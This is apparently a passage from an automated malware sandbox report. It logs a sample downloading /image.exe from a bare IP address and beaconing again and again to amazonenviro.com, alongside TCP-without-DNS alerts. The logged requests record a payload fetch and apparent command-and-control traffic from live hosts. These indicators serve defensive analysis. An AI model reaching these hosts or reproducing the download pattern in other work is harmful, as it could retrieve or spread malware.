00 00 1c 0a 00 00 9c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 12 00 00 00 00 00 00 b8 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /image.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com

Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113

Source: global traffic	HTTP traffic detected: GET /image.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
